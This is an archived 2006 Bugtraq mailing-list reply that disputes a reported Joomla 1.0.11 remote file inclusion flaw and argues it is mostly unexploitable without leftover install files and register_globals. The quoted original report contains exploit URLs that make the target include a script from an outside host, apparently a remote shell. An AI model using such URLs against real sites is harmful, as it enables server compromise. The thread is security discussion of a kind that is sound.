lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <OF8AB10C7F.39B1085E-ONC1257220.00359F42-C1257220.003718DD@abit.de>
Date: Wed, 8 Nov 2006 11:01:44 +0100
From: srunschke@...t.de
To: bugtraq@...urityfocus.com
Subject: Antwort: Joomla 1.0.11   Remote File Include

root@...b4services.com schrieb am 06.11.2006 13:28:37:

> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=
> 
> Bug : include_once ( $mosConfig_absolute_path . '/language/'. 
> $mosConfig_lang .'.php' );
> 
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=
> 
> Exploit : www.target.com/script_path/installation/index.php?
> mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt?
> ------> www.target.
> com/script_path/administrator/components/com_admin/admin.admin.html.php?
> mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt?

1. The installation directory is to be removed after the installation
of Joomla!. If you do not follow the instructions - your fault. Having
the installation files still on your webserver makes your whole server
totally prone of being hijacked, since you can rewrite the configuration.
So no need for some remote file inclusion when you can just reset the
site with install files...

2. The admin.admin.html.php file is not directly accessible:
"// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );"
So I do not see how this could be exploitable at all.

Anyways, this all only works if you have register_globals enabled,
which is strongly discouraged by Joomla!, it even gives you big
red warnings to turn it off everytime you enter the admin backend.
Hacks is what you get when ignoring security warnings.

regards
        Sascha

--
Sascha Runschke
Netzwerk Management
IT-Services

ABIT AG
Robert-Bosch-Str. 1
40668 Meerbusch

Tel.:+49 (0) 2150.9153.226
Mobil:+49 (0) 173.5419665
mailto:SRunschke@...t.de

http://www.abit.net
http://www.abit-epos.net
---------------------------------
Sicherheitshinweis zur E-Mail Kommunikation /
  Security note regarding email communication:
http://www.abit.net/sicherheitshinweis.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ